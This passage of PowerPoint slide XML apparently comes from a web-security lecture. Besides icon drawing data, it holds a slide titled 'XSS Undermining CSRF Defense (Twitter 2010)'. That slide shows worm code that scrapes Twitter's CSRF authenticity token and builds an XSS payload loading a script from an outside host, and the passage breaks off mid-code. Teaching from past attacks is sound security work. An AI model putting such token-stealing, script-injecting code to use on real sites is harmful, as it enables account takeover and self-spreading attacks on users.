                      <a:pt x="9875" y="17843"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11906" y="17843"/>
                      <a:pt x="13718" y="16843"/>
                      <a:pt x="14780" y="15218"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17311" y="15030"/>
                      <a:pt x="19468" y="13186"/>
                      <a:pt x="20061" y="10718"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20436" y="9156"/>
                      <a:pt x="20186" y="7594"/>
                      <a:pt x="19374" y="6219"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9875" y="16968"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="9875" y="16968"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9469" y="16968"/>
                      <a:pt x="9062" y="16936"/>
                      <a:pt x="8687" y="16843"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7375" y="16530"/>
                      <a:pt x="6250" y="15718"/>
                      <a:pt x="5562" y="14561"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4844" y="13405"/>
                      <a:pt x="4656" y="12061"/>
                      <a:pt x="4969" y="10749"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5500" y="8594"/>
                      <a:pt x="7344" y="7031"/>
                      <a:pt x="9562" y="6906"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9656" y="6906"/>
                      <a:pt x="9656" y="6906"/>
                      <a:pt x="9656" y="6906"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9781" y="6906"/>
                      <a:pt x="9875" y="6906"/>
                      <a:pt x="10000" y="6906"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10000" y="6906"/>
                      <a:pt x="10000" y="6906"/>
                      <a:pt x="10031" y="6906"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10125" y="6906"/>
                      <a:pt x="10219" y="6906"/>
                      <a:pt x="10312" y="6937"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10344" y="6937"/>
                      <a:pt x="10344" y="6937"/>
                      <a:pt x="10375" y="6937"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10469" y="6937"/>
                      <a:pt x="10562" y="6968"/>
                      <a:pt x="10656" y="6968"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10656" y="6968"/>
                      <a:pt x="10687" y="6968"/>
                      <a:pt x="10719" y="6968"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10812" y="7000"/>
                      <a:pt x="10937" y="7031"/>
                      <a:pt x="11031" y="7031"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12343" y="7344"/>
                      <a:pt x="13436" y="8156"/>
                      <a:pt x="14155" y="9312"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14843" y="10468"/>
                      <a:pt x="15061" y="11811"/>
                      <a:pt x="14749" y="13124"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14718" y="13249"/>
                      <a:pt x="14686" y="13343"/>
                      <a:pt x="14655" y="13468"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14655" y="13499"/>
                      <a:pt x="14655" y="13499"/>
                      <a:pt x="14624" y="13499"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14593" y="13624"/>
                      <a:pt x="14561" y="13749"/>
                      <a:pt x="14499" y="13843"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14499" y="13874"/>
                      <a:pt x="14499" y="13874"/>
                      <a:pt x="14499" y="13874"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14405" y="14093"/>
                      <a:pt x="14280" y="14343"/>
                      <a:pt x="14155" y="14561"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14061" y="14686"/>
                      <a:pt x="14061" y="14686"/>
                      <a:pt x="14061" y="14686"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13155" y="16092"/>
                      <a:pt x="11594" y="16968"/>
                      <a:pt x="9875" y="16968"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="19218" y="10499"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="19218" y="10499"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="18749" y="12405"/>
                      <a:pt x="17186" y="13874"/>
                      <a:pt x="15311" y="14249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15374" y="14093"/>
                      <a:pt x="15405" y="13968"/>
                      <a:pt x="15468" y="13811"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15468" y="13780"/>
                      <a:pt x="15468" y="13749"/>
                      <a:pt x="15499" y="13749"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15499" y="13686"/>
                      <a:pt x="15530" y="13624"/>
                      <a:pt x="15530" y="13561"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15561" y="13499"/>
                      <a:pt x="15593" y="13405"/>
                      <a:pt x="15593" y="13311"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15968" y="11780"/>
                      <a:pt x="15718" y="10186"/>
                      <a:pt x="14905" y="8844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14093" y="7500"/>
                      <a:pt x="12780" y="6562"/>
                      <a:pt x="11250" y="6187"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11125" y="6156"/>
                      <a:pt x="11000" y="6125"/>
                      <a:pt x="10875" y="6125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10844" y="6094"/>
                      <a:pt x="10812" y="6094"/>
                      <a:pt x="10812" y="6094"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10687" y="6094"/>
                      <a:pt x="10594" y="6062"/>
                      <a:pt x="10500" y="6062"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10500" y="6062"/>
                      <a:pt x="10500" y="6062"/>
                      <a:pt x="10469" y="6062"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11437" y="4937"/>
                      <a:pt x="12843" y="4281"/>
                      <a:pt x="14311" y="4281"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14718" y="4281"/>
                      <a:pt x="15093" y="4344"/>
                      <a:pt x="15499" y="4437"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16811" y="4750"/>
                      <a:pt x="17905" y="5531"/>
                      <a:pt x="18624" y="6687"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19311" y="7844"/>
                      <a:pt x="19530" y="9187"/>
                      <a:pt x="19218" y="10499"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="12686" y="12749"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="12686" y="12749"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="12094" y="12593"/>
                      <a:pt x="11500" y="12968"/>
                      <a:pt x="11375" y="13530"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11219" y="14124"/>
                      <a:pt x="11594" y="14718"/>
                      <a:pt x="12187" y="14874"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12749" y="14999"/>
                      <a:pt x="13343" y="14655"/>
                      <a:pt x="13499" y="14061"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13624" y="13468"/>
                      <a:pt x="13280" y="12874"/>
                      <a:pt x="12686" y="12749"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10375" y="7750"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="10375" y="7750"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9781" y="7594"/>
                      <a:pt x="9187" y="7969"/>
                      <a:pt x="9062" y="8562"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8906" y="9156"/>
                      <a:pt x="9281" y="9750"/>
                      <a:pt x="9875" y="9874"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10437" y="10030"/>
                      <a:pt x="11031" y="9656"/>
                      <a:pt x="11187" y="9062"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11312" y="8469"/>
                      <a:pt x="10969" y="7906"/>
                      <a:pt x="10375" y="7750"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="7375" y="10561"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7375" y="10561"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="6781" y="10436"/>
                      <a:pt x="6187" y="10780"/>
                      <a:pt x="6031" y="11374"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5906" y="11968"/>
                      <a:pt x="6250" y="12561"/>
                      <a:pt x="6844" y="12686"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7437" y="12843"/>
                      <a:pt x="8031" y="12468"/>
                      <a:pt x="8156" y="11905"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8312" y="11311"/>
                      <a:pt x="7937" y="10718"/>
                      <a:pt x="7375" y="10561"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="13311" y="10530"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="13311" y="10530"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="12936" y="10436"/>
                      <a:pt x="12593" y="10655"/>
                      <a:pt x="12499" y="10999"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12405" y="11374"/>
                      <a:pt x="12624" y="11718"/>
                      <a:pt x="12999" y="11811"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13343" y="11905"/>
                      <a:pt x="13686" y="11686"/>
                      <a:pt x="13780" y="11311"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13874" y="10968"/>
                      <a:pt x="13655" y="10624"/>
                      <a:pt x="13311" y="10530"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9812" y="11030"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="9812" y="11030"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9469" y="10968"/>
                      <a:pt x="9094" y="11186"/>
                      <a:pt x="9031" y="11530"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8937" y="11874"/>
                      <a:pt x="9156" y="12249"/>
                      <a:pt x="9500" y="12311"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9844" y="12405"/>
                      <a:pt x="10219" y="12186"/>
                      <a:pt x="10281" y="11843"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10375" y="11468"/>
                      <a:pt x="10156" y="11124"/>
                      <a:pt x="9812" y="11030"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9437" y="14124"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="9437" y="14124"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9094" y="14030"/>
                      <a:pt x="8719" y="14249"/>
                      <a:pt x="8656" y="14593"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8562" y="14968"/>
                      <a:pt x="8781" y="15311"/>
                      <a:pt x="9125" y="15405"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9469" y="15468"/>
                      <a:pt x="9844" y="15280"/>
                      <a:pt x="9906" y="14905"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10000" y="14561"/>
                      <a:pt x="9781" y="14218"/>
                      <a:pt x="9437" y="14124"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1977858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18" y="131523"/>
            <a:ext cx="8229600" cy="910694"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>XSS Undermining CSRF Defense (Twitter 2010)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="369518" y="1193061"/>
            <a:ext cx="8229600" cy="4803775"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> content = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>document.documentElement.innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>authreg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>RegExp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>(/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>twttr.form_authenticity_token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> = '(.*)';/g);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>authtoken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>authreg.exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>(content);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>authtoken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>authtoken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>[1];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>//alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>authtoken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>urlencode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>www.stalkdaily.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>"&gt;&lt;/a&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>mikeyylolz.uuuq.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>x.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>"&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>'); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ajaxConn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
